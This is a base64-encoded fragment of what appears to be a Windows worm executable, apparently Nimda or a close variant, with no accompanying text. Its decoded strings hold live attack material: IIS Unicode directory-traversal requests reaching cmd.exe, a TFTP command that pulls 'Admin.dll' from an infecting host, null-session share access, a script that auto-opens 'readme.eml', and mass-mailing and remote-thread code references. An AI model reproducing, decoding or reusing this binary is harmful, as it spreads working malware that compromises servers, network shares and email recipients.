U3BhY2UgRXhlY3V0YWJsZQBNYXBwZWQgU3BhY2UgV3JpdGUgQ29weQBNYXBwZWQgU3BhY2UgUmVh ZC9Xcml0ZQBNYXBwZWQgU3BhY2UgUmVhZCBPbmx5AABNYXBwZWQgU3BhY2UgTm8gQWNjZXNzAABS ZXNlcnZlZCBTcGFjZSBFeGVjIFdyaXRlIENvcHkAAFJlc2VydmVkIFNwYWNlIEV4ZWMgUmVhZC9X cml0ZQAAUmVzZXJ2ZWQgU3BhY2UgRXhlYyBSZWFkIE9ubHkAAABSZXNlcnZlZCBTcGFjZSBFeGVj dXRhYmxlAAAAUmVzZXJ2ZWQgU3BhY2UgV3JpdGUgQ29weQAAAFJlc2VydmVkIFNwYWNlIFJlYWQv V3JpdGUAAABSZXNlcnZlZCBTcGFjZSBSZWFkIE9ubHkAAAAAUmVzZXJ2ZWQgU3BhY2UgTm8gQWNj ZXNzAAAAAFByb2Nlc3MgQWRkcmVzcyBTcGFjZQAAAEV4ZWMgV3JpdGUgQ29weQBFeGVjIFJlYWQv V3JpdGUARXhlYyBSZWFkIE9ubHkAAEV4ZWN1dGFibGUAAFdyaXRlIENvcHkAAFJlYWQvV3JpdGUA AFJlYWQgT25seQAAAE5vIEFjY2VzcwAAAEltYWdlAAAAVXNlciBQQwBUaHJlYWQgRGV0YWlscwAA SUQgVGhyZWFkAAAAUHJpb3JpdHkgQ3VycmVudAAAAABDb250ZXh0IFN3aXRjaGVzL3NlYwAAAABT dGFydCBBZGRyZXNzAAAAVGhyZWFkAABQYWdlIEZhdWx0cy9zZWMAVmlydHVhbCBCeXRlcyBQZWFr AABWaXJ0dWFsIEJ5dGVzAAAAUHJpdmF0ZSBCeXRlcwAAAElEIFByb2Nlc3MAAEVsYXBzZWQgVGlt ZQAAAABQcmlvcml0eSBCYXNlAAAAV29ya2luZyBTZXQgUGVhawAAAABXb3JraW5nIFNldAAlIFVz ZXIgVGltZQAlIFByaXZpbGVnZWQgVGltZQAAACUgUHJvY2Vzc29yIFRpbWUAAAAAUHJvY2VzcwBD b3VudGVyIDAwOQBzb2Z0d2FyZVxtaWNyb3NvZnRcd2luZG93cyBudFxjdXJyZW50dmVyc2lvblxw ZXJmbGliXDAwOQAAAABDb3VudGVycwAAAABWZXJzaW9uAExhc3QgQ291bnRlcgAAAABzb2Z0d2Fy ZVxtaWNyb3NvZnRcd2luZG93cyBudFxjdXJyZW50dmVyc2lvblxwZXJmbGliAAAAAC9zY3JpcHRz AAAAAC9NU0FEQwAAL2MAAC9kAAAvc2NyaXB0cy8uLiUyNTVjLi4AAC9fdnRpX2Jpbi8uLiUyNTVj Li4vLi4lMjU1Yy4uLy4uJTI1NWMuLgAvX21lbV9iaW4vLi4lMjU1Yy4uLy4uJTI1NWMuLi8uLiUy NTVjLi4AL21zYWRjLy4uJTI1NWMuLi8uLiUyNTVjLi4vLi4lMjU1Yy8uLiVjMSUxYy4uLy4uJWMx JTFjLi4vLi4lYzElMWMuLgAvc2NyaXB0cy8uLiVjMSUxYy4uAC9zY3JpcHRzLy4uJWMwJTJmLi4A L3NjcmlwdHMvLi4lYzAlYWYuLgAvc2NyaXB0cy8uLiVjMSU5Yy4uAC9zY3JpcHRzLy4uJSUzNSU2 My4uAAAAAC9zY3JpcHRzLy4uJSUzNWMuLgAAL3NjcmlwdHMvLi4lMjUlMzUlNjMuLgAAL3Njcmlw dHMvLi4lMjUyZi4uAAAvcm9vdC5leGU/L2MrAAAAL3dpbm50L3N5c3RlbTMyL2NtZC5leGU/L2Mr AG5ldCUlMjB1c2UlJTIwXFwlc1xpcGMkJSUyMCIiJSUyMC91c2VyOiJndWVzdCIAAHRmdHAlJTIw LWklJTIwJXMlJTIwR0VUJSUyMEFkbWluLmRsbCUlMjAAAAAAQWRtaW4uZGxsAAAAYzpcQWRtaW4u ZGxsAAAAAGQ6XEFkbWluLmRsbAAAAABlOlxBZG1pbi5kbGwAAAAADQo8aHRtbD48c2NyaXB0IGxh bmd1YWdlPSJKYXZhU2NyaXB0Ij53aW5kb3cub3BlbigicmVhZG1lLmVtbCIsIG51bGwsICJyZXNp emFibGU9bm8sdG9wPTYwMDAsbGVmdD02MDAwIik8L3NjcmlwdD48L2h0bWw+AAAAAC9BZG1pbi5k bGwAAGRpcgBHRVQgJXMgSFRUUC8xLjANCkhvc3Q6IHd3dw0KQ29ubm5lY3Rpb246IGNsb3NlDQoN CgAAYzoAAHJlYWRtZQAAbWFpbgAAAABpbmRleAAAAGRlZmF1bHQAaHRtbAAAAAAuYXNwAAAAAC5o dG0AAAAAXHJlYWRtZS5lbWwALmV4ZQAAAABtZXAAd2luemlwMzIuZXhlAAAAAHJpY2hlZDIwLmRs bAAAAAAubndzAAAAAC5lbWwAAAAALmRvYwAAAAAgLmV4ZQAAAGRvbnRydW5vbGQAAGlvY3Rsc29j a2V0AGdldGhvc3RieW5hbWUAAABnZXRob3N0bmFtZQBpbmV0X250b2EAAABpbmV0X2FkZHIAAABu dG9obAAAAGh0b25sAAAAbnRvaHMAAABodG9ucwAAAGNsb3Nlc29ja2V0AHNlbGVjdAAAc2VuZHRv AABzZW5kAAAAAHJlY3Zmcm9tAAAAAHJlY3YAAAAAYmluZAAAAABjb25uZWN0AHNvY2tldAAAX19X U0FGRElzU2V0AAAAAFdTQUNsZWFudXAAAFdTQVN0YXJ0dXAAAHdzMl8zMi5kbGwAAE1BUElMb2dv ZmYAAE1BUElTZW5kTWFpbAAAAABNQVBJRnJlZUJ1ZmZlcgAATUFQSVJlYWRNYWlsAAAAAE1BUElG aW5kTmV4dAAAAABNQVBJUmVzb2x2ZU5hbWUATUFQSUxvZ29uAAAATUFQSTMyLkRMTAAAV05ldEFk ZENvbm5lY3Rpb24yQQBXTmV0Q2FuY2VsQ29ubmVjdGlvbjJBAABXTmV0T3BlbkVudW1BAAAAV05l dEVudW1SZXNvdXJjZUEAAABXTmV0Q2xvc2VFbnVtAAAATVBSLkRMTABTaGVsbEV4ZWN1dGVBAAAA U0hFTEwzMi5ETEwAUmVnaXN0ZXJTZXJ2aWNlUHJvY2VzcwAAVmlydHVhbEZyZWVFeAAAAFZpcnR1 YWxRdWVyeUV4AABWaXJ0dWFsQWxsb2NFeAAAVmlydHVhbFByb3RlY3RFeAAAAABDcmVhdGVSZW1v dGVUaHJlYWQAAEhlYXBDb21wYWN0AEhlYXBGcmVlAAAAAEhlYXBBbGxvYwAAAEhlYXBEZXN0cm95 AEhlYXBDcmVhdGUAAEtFUk5FTDMyLkRMTAAAAABTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xD dXJyZW50VmVyc2lvblxBcHAgUGF0aHNcAAAAAFNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1 cnJlbnRWZXJzaW9uXEFwcCBQYXRocwBUeXBlAAAAAFJlbWFyawAAWDpcAFNPRlRXQVJFXE1pY3Jv c29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXE5ldHdvcmtcTGFuTWFuXFgkAFBhcm0yZW5jAAAA AFBhcm0xZW5jAAAAAEZsYWdzAAAAUGF0aAAAAABTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xD dXJyZW50VmVyc2lvblxOZXR3b3JrXExhbk1hblwAAABTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93 c1xDdXJyZW50VmVyc2lvblxOZXR3b3JrXExhbk1hbgAAAABTWVNURU1cQ3VycmVudENvbnRyb2xT ZXRcU2VydmljZXNcbGFubWFuc2VydmVyXFNoYXJlcwAAAA0KAABDYWNoZQAAAFNvZnR3YXJlXE1p Y3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXEV4cGxvcmVyXE1hcE1haWwAAFFVSVQNCgAA Lg0KAFN1YmplY3Q6IAAAAEZyb206IDwAREFUQQ0KAABSQ1BUIFRPOiA8AAA+DQoATUFJTCBGUk9N OiA8AAAAAEhFTE8gAAAAYWFiYmNjAAAgLWRvbnRydW5vbGQAAAAATlVMTAAAAABccmVhZG1lKi5l eGUAAAAAYWRtaW4uZGxsAAAAcXVzZXJ5OWJub3cAIC1xdXNlcnk5Ym5vdwAAAFxtbWMuZXhlAAAA AFxyaWNoZWQyMC5kbGwAAABib290AAAAAFNoZWxsAAAAZXhwbG9yZXIuZXhlIGxvYWQuZXhlIC1k b250cnVub2xkAAAAXHN5c3RlbS5pbmkAXGxvYWQuZXhlAAAAXFwAAG9jdGV0AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARLkhHwQAAAAAAAMAAwAAACgAAIAKAAAAYAAA gA4AAAB4AACAAAAAAES5IR8EAAAAAAAFAAEAAACQAACAAgAAAKgAAIADAAAAwAAAgAQAAADYAACA BQAAAPAAAIAAAAAARLkhHwQAAAAAAAEAZgAAAAgBAIAAAAAARLkhHwQAAAAAAAEAZQAAACABAIAA AAAARLkhHwQAAAAAAAEABAgAADgBAAAAAAAARLkhHwQAAAAAAAEABAgAAEgBAAAAAAAARLkhHwQA AAAAAAEABAgAAFgBAAAAAAAARLkhHwQAAAAAAAEABAgAAGgBAAAAAAAARLkhHwQAAAAAAAEABAgA AHgBAAAAAAAARLkhHwQAAAAAAAEABAgAAIgBAAAAAAAARLkhHwQAAAAAAAEABAgAAJgBAACo4QAA KAEAAOQEAAAAAAAA0OIAAOgCAADkBAAAAAAAALjlAACoCAAA5AQAAAAAAABg7gAAqA4AAOQEAAAA AAAACP0AADABAADkBAAAAAAAADj+AAABAAAA5AQAAAAAAAA8/gAATAAAAOQEAAAAAAAAKAAAABAA AAAgAAAAAQAEAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAIAAAACAgACAAAAAgACA AICAAACAgIAAwMDAAAAA/wAA/wAAAP//AP8AAAD/AP8A//8AAP///wAAB3d3d3d3cAAHiIiIiIhw AMcP+I+IiHAMAAZm+PiIcDxMzMxvj4hwd0zIjMb4iHB3bG///4+IcAeMZmZm+IhwBHhv/Ob/iHAA R4zOb/+HcAAEZmb8+HdwAAcP9m/3AAAABw////cHAAAHAAAAB3AAAAd3d3d3AAAAAAAAAAAAAOAB gADgAQCAyAH//6AB//gAAQAAAAEAgAAB//+AAf/4gAEAAMABAIDgAf//6AH/+OgLAADv5wCA4A8A AP//AAgoAAAAIAAAAEAAAAABAAQAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAgAAA AICAAIAAAACAAIAAgIAAAMDAwACAgIAAAAD/AAD/AAAA//8A/wAAAP8A/wD//wAA////AAAAAAAA AAAAAAAAAAAAAAAAAACIiIiIiIiIiIiIiIgAAAAAh3d3d3d3d3d3d3d4AAAAAI////f3d3d3d3d3 eAAAAACA////d/f3d3d3d3gAAAAAgP////9/f393d3d4AAAEzMD///////f393d3eAAATACMBMZm b////393d3gAAEwAAMZszMZv//f393d4AAjEBExszMzMxv//f3d3eAAIZETGzGZszMxv//d3d3gA CDZMZsb//MzGxv//d3d4AAiMxGxv//9MZub/9/d3eAAIg2xsb/////////9/d3gACHiGbGZmZmZm Zv///3d4AACHhszMzGZu7ub///f3eAAAyHzGZmZmZu7m////d3gAAASHxm///0bu5v////d4AAAM SHxm//Rmfm////93eAAAAMaHZszGbu5v////93gAAAAMZnzMxubm//////94AAAAAMbMzMxub/z/ ///3eAAAAACAZmZmZv/2////d4gAAAAAgP//Zm//YP//93iIAAAAAID///9mZv///3eIiAAAAACA //////////gAAAAAAAAAgP/////////4B3iAAAAAAID/////////+HeIAAAAAACA//////////h4 gAAAAAAAgP/////////4iAAAAAAAAIAAAAAAAAAACIAAAAAAAACIiIiIiIiIiIgAAAAA//////wA AAP8AAAD/AAAA/0AAAP9AAAD4QAAA8wAAAPMAAADiAAAA4AAAAOAAAADgAAAA4AAAAOAAAADwAAA A8AAAAPgAAAD4AAAA/AAAAP4AAAD/AAAA/0AAAP9ABAD/QAAA/0AAAP9AACH/QAAD/0AAB/9AAA/ /f/+f/wAAP8oAAAAIAAAAEAAAAABAAgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAA gAAAAICAAIAAAACAAIAAgIAAAMDAwADA3MAA8MqmAAQEBAAICAgADAwMABEREQAWFhYAHBwcACIi IgApKSkAVVVVAE1NTQBCQkIAOTk5AIB8/wBQUP8AkwDWAP/szADG1u8A1ufnAJCprQAAADMAAABm AAAAmQAAAMwAADMAAAAzMwAAM2YAADOZAAAzzAAAM/8AAGYAAABmMwAAZmYAAGaZAABmzAAAZv8A AJkAAACZMwAAmWYAAJmZAACZzAAAmf8AAMwAAADMMwAAzGYAAMyZAADMzAAAzP8AAP9mAAD/mQAA /8wAMwAAADMAMwAzAGYAMwCZADMAzAAzAP8AMzMAADMzMwAzM2YAMzOZADMzzAAzM/8AM2YAADNm MwAzZmYAM2aZADNmzAAzZv8AM5kAADOZMwAzmWYAM5mZADOZzAAzmf8AM8wAADPMMwAzzGYAM8yZ ADPMzAAzzP8AM/8zADP/ZgAz/5kAM//MADP//wBmAAAAZgAzAGYAZgBmAJkAZgDMAGYA/wBmMwAA ZjMzAGYzZgBmM5kAZjPMAGYz/wBmZgAAZmYzAGZmZgBmZpkAZmbMAGaZAABmmTMAZplmAGaZmQBm mcwAZpn/AGbMAABmzDMAZsyZAGbMzABmzP8AZv8AAGb/MwBm/5kAZv/MAMwA/wD/AMwAmZkAAJkz mQCZAJkAmQDMAJkAAACZMzMAmQBmAJkzzACZAP8AmWYAAJlmMwCZM2YAmWaZAJlmzACZM/8AmZkz AJmZZgCZmZkAmZnMAJmZ/wCZzAAAmcwzAGbMZgCZzJkAmczMAJnM/wCZ/wAAmf8zAJnMZgCZ/5kA mf/MAJn//wDMAAAAmQAzAMwAZgDMAJkAzADMAJkzAADMMzMAzDNmAMwzmQDMM8wAzDP/AMxmAADM ZjMAmWZmAMxmmQDMZswAmWb/AMyZAADMmTMAzJlmAMyZmQDMmcwAzJn/AMzMAADMzDMAzMxmAMzM mQDMzMwAzMz/AMz/AADM/zMAmf9mAMz/mQDM/8wAzP//AMwAMwD/AGYA/wCZAMwzAAD/MzMA/zNm AP8zmQD/M8wA/zP/AP9mAAD/ZjMAzGZmAP9mmQD/ZswAzGb/AP+ZAAD/mTMA/5lmAP+ZmQD/mcwA /5n/AP/MAAD/zDMA/8xmAP/MmQD/zMwA/8z/AP//MwDM/2YA//+ZAP//zABmZv8AZv9mAGb//wD/ ZmYA/2b/AP//ZgAhAKUAX19fAHd3dwCGhoYAlpaWAMvLywCysrIA19fXAN3d3QDj4+MA6urqAPHx 8QD4+PgA8Pv/AKSgoACAgIAAAAD/AAD/AAAA//8A/wAAAP8A/wD//wAA////AAoKCgoKCgoKCgoK CgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoK6xISEhISEhISEhISEhISEhISEhISEhISCgoKCgoK CgrrvLy8vLy8vLy8vLy8vLy8vLy8vLy8vBIKCgoKCgoKCuvz8/Pz8/Mb8xsbGxsbGxsbGxsbGxu8 EgoKCgoKCgoK6wr09PTz9PMbG/Mb8xsbGxsbGxsbG7wSCgoKCgoKCgrrCvb09vTz9PPzG/Mb8xvz GxsbGxsbvBIKCgoKCgSnp6cK9Pb09vTz9PTz8/Mb8xvzGxsbGxu8EgoKCgoEpwoK66cKhaeKioqK 8/Tz9PPz8xvzGxsbG7wSCgoKCgSnCgoKCqeLrM7Ozs6KivTz9PMb8xvzGxsbvBIKCgrrpwQKZoan i87Ozs7Ozs7OivTz9PMb8xsbGxu8EgoKCuqtpmaFp4vOzqysrM7Ozs7OivTz8/MbGxsbG7wSCgoK 6gOthqeLrM6s9vb2p87OzrLOivTz8/MbGxsbvBIKCgrqc86nhovOrPb29vb2hc6ystOK8/TzG/Mb Gxu8EgoKCut0A62ni86s9vb29vb29vb29vP08/TzG/MbG7wSCgoK65l0z4uszqysrKysrKysrKys rPT09PPz8xsbvBIKCgoK65ntrM7Ozs7OzrOzs9PT09Os9vTz9PMb8xu8EgoKCgqnc5rOzqysrKys rKysrNnZ06z09PTz8/MbG7wSCgoKCgqGkaDOrKz29vb29oWs6NnTrPb09PTz8/MbvBIKCgoKCqeG kaDOrKz29vaFrLPh6Kz29Pb08/TzGxu8EgoKCgoKCqestO+srKenp6yz2ejTrPb29PT08/PzG7wS CgoKCgoKCqesrLvOzs7Os9Oz06z29vT29PT08/PzvBIKCgoKCgoKCqeszs7Ozs7Os9Os9vbO9vT2 9PTz87wHEgoKCgoKCgoK6wqsrKysrKysrPb29qz29vT09PO8B5ISCgoKCgoKCgrrCvb29vasrKz2 9vasCvb09vTzvAeSkhIKCgoKCgoKCusK9vb29vb2rKysrPb29vb087wHkpLrEgoKCgoKCgoK6wr2 9vb29vb29vb29vb29vYSQ0NDQ0NDCgoKCgoKCgrrCvb29vb29vb29vb29vb29pIKG7ySEgoKCgoK CgoKCusK9vb29vb29vb29vb29vb2khu8khIKCgoKCgoKCgoK6wr29vb29vb29vb29vb29vaSvJIS CgoKCgoKCgoKCgrrCvb29vb29vb29vb29vb29pKSEgoKCgoKCgoKCgoKCusKCgoKCgoKCgoKCgoK CgoKkhIKCgoKCgoKCgoKCgoK6+zs7Ozs7Ozs7Ozs7Ozs7OzsCgoKCgoKCgr//////AAAA/wAAAP8 AAAD/QAAA/0AAAPhAAADzAAAA8wAAAOIAAADgAAAA4AAAAOAAAADgAAAA4AAAAPAAAADwAAAA+AA AAPgAAAD8AAAA/gAAAP8AAAD/QAAA/0AEAP9AAAD/QAAA/0AAIf9AAAP/QAAH/0AAD/9//5//AAA /ygAAAAwAAAAYAAAAAEACAAAAAAAAAkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAACAAAAAgIAA gAAAAIAAgACAgAAAwMDAAMDcwADwyqYABAQEAAgICAAMDAwAERERABYWFgAcHBwAIiIiACkpKQBV VVUATU1NAEJCQgA5OTkAgHz/AFBQ/wCTANYA/+zMAMbW7wDW5+cAkKmtAAAAMwAAAGYAAACZAAAA zAAAMwAAADMzAAAzZgAAM5kAADPMAAAz/wAAZgAAAGYzAABmZgAAZpkAAGbMAABm/wAAmQAAAJkz AACZZgAAmZkAAJnMAACZ/wAAzAAAAMwzAADMZgAAzJkAAMzMAADM/wAA/2YAAP+ZAAD/zAAzAAAA MwAzADMAZgAzAJkAMwDMADMA/wAzMwAAMzMzADMzZgAzM5kAMzPMADMz/wAzZgAAM2YzADNmZgAz ZpkAM2bMADNm/wAzmQAAM5kzADOZZgAzmZkAM5nMADOZ/wAzzAAAM8wzADPMZgAzzJkAM8zMADPM /wAz/zMAM/9mADP/mQAz/8wAM///AGYAAABmADMAZgBmAGYAmQBmAMwAZgD/AGYzAABmMzMAZjNm AGYzmQBmM8wAZjP/AGZmAABmZjMAZmZmAGZmmQBmZswAZpkAAGaZMwBmmWYAZpmZAGaZzABmmf8A ZswAAGbMMwBmzJkAZszMAGbM/wBm/wAAZv8zAGb/mQBm/8wAzAD/AP8AzACZmQAAmTOZAJkAmQCZ AMwAmQAAAJkzMwCZAGYAmTPMAJkA/wCZZgAAmWYzAJkzZgCZZpkAmWbMAJkz/wCZmTMAmZlmAJmZ mQCZmcwAmZn/AJnMAACZzDMAZsxmAJnMmQCZzMwAmcz/AJn/AACZ/zMAmcxmAJn/mQCZ/8wAmf// AMwAAACZADMAzABmAMwAmQDMAMwAmTMAAMwzMwDMM2YAzDOZAMwzzADMM/8AzGYAAMxmMwCZZmYA zGaZAMxmzACZZv8AzJkAAMyZMwDMmWYAzJmZAMyZzADMmf8AzMwAAMzMMwDMzGYAzMyZAMzMzADM zP8AzP8AAMz/MwCZ/2YAzP+ZAMz/zADM//8AzAAzAP8AZgD/AJkAzDMAAP8zMwD/M2YA/zOZAP8z zAD/M/8A/2YAAP9mMwDMZmYA/2aZAP9mzADMZv8A/5kAAP+ZMwD/mWYA/5mZAP+ZzAD/mf8A/8wA AP/MMwD/zGYA/8yZAP/MzAD/zP8A//8zAMz/ZgD//5kA///MAGZm/wBm/2YAZv//AP9mZgD/Zv8A //9mACEApQBfX18Ad3d3AIaGhgCWlpYAy8vLALKysgDX19cA3d3dAOPj4wDq6uoA8fHxAPj4+ADw +/8ApKCgAICAgAAAAP8AAP8AAAD//wD/AAAA/wD/AP//AAD///8ACgoKCgoKCgoKCgoKCgoKCgoK CgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgrrEhISEhISEhISEhISEhISEhIS EhISEhISEhISEhISEhISEhISCgoKCgoKCgoKCgrrEhISEhISEhISEhISEhISEhISEhISEhISEhIS EhISEhISEhISCgoKCgoKCgoKCgrrvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vBIS CgoKCgoKCgoKCgrr8/Pz8/Pz8/Pz8xvz8xsbGxsbGxsbGxsbGxsbGxsbGxsbvBISCgoKCgoKCgoK Cgrr8/Pz8/Pz8/Pz8xvz8xsbGxsbGxsbGxsbGxsbGxsbGxsbvBISCgoKCgoKCgoKCgrrCgr09PT0 9PP09PMbGxvz8xvz8xsbGxsbGxsbGxsbGxsbvBISCgoKCgoKCgoKCgrrCgr09PT09PP09PMbGxvz 8xvz8xsbGxsbGxsbGxsbGxsbvBISCgoKCgoKCgoKCgrrCgr29PT29vTz8/Tz8/MbG/MbG/MbG/Pz GxsbGxsbGxsbvBISCgoKCgoKBASnp6enCgr09vb09Pb09PP09PTz8/Pz8xvz8xsb8xsbGxsbGxsb vBISCgoKCgoKBASnp6enCgr09vb09Pb09PP09PTz8/Pz8xvz8xsb8xsbGxsbGxsbvBISCgoKCgoE 